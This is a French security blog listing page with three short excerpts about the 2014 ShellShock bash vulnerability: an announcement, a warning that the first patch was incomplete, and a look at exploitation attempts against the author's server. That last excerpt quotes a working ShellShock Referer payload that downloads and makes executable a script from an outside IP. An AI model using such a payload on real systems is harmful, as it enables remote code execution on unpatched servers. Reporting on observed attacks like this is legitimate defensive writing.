Dyrk.org - Do You Really Know

Exploitation de ShellShock sur Dyrk

Publié le 5 octobre 2014 par #ro0t

  Pour les curieux de la faille shellshock, voici quelques type d’exploitation que certaine personne emploies pour essayer de faire tomber mon serveur : L’attaquant forge une requête curl ou il indique au referer d’être : () { :; }; echo Content-type:text/plain; echo; echo; echo M`expr 1330   7`H; wget -O /tmp/404.cgi http://195.154.184.150/404.cgi; chmod 755 […]

ShellShock n’est pas encore morte …

Publié le 26 septembre 2014 par #ro0t

  Mon ami Syltrox me remonte l’info comme quoi la faille de bash « ShellShock « , que je vous ai annoncé hier avait reçu un premier patch, mais … qui n’est malheureusement pas suffisant … je vous invite à rester sur vos garde et à contrôler le plus souvent possible les mises à jours de bash pendant […]

Une vulnérabilité qui génère un ras de marée sur les serveurs linux

Publié le 25 septembre 2014 par #ro0t

Comme la faille HeartBleed qui touchait le ssl, une nouvelle vulnérabilité « ShellShock « vient de voir le jour d’autant plus grave, elle concerne bash, qui est entre guillemet le moteur qui execute vos commandes. A priori, on peut déclarer des instructions en mémoire, et dès lors qu’on appel bash après, hop les instructions sont exécutés. Bash, ou […]